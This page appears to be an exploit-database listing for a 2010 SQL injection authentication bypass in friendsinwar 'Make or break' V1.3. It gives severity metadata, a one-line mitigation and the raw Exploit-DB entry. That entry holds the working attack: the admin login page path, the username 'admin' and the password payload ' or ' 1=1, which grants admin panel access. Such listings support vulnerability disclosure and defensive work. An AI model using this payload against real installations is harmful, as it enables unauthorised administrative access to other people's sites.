header-logo
Suggest Exploit
vendor:
Make or break
by:
d3b4g
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Make or break
Affected Version From: V1.3
Affected Version To: V1.3
Patch Exists: N/A
Related CWE: N/A
CPE: a:friendsinwar:make_or_break:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2010

friendsinwar Make or break V1.3 SQL Injection (authbypass) Vulnerability

A vulnerability exists in the friendsinwar Make or break V1.3 software, which allows an attacker to bypass authentication by using the ' or ' 1=1 credentials. This allows the attacker to gain access to the admin panel.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: friendsinwar Make or break V1.3 SQL Injection (authbypass) Vulnerability
# Date: 13.10.201
# Exploit Author: d3b4g 
# Vendor Homepage: http://www.friendsinwar.com
# Software Link: http://www.friendsinwar.com/script_demo/make_or_break/admin/login.php
# Tested on: Windows 7
# Blog: d3b4g.me
 
 
  
   
----------------------------------------------------------------------------------
     () SQL Injection :
 
 
     http://localhost/script_demo/make_or_break/admin/login.php
 
     + Use following information to bypass login.
 
  
      User:admin
      
      ' or ' 1=1
 
 
      
 
 
 
 
-end-

Navigation

Suggest Exploit

Services By CQR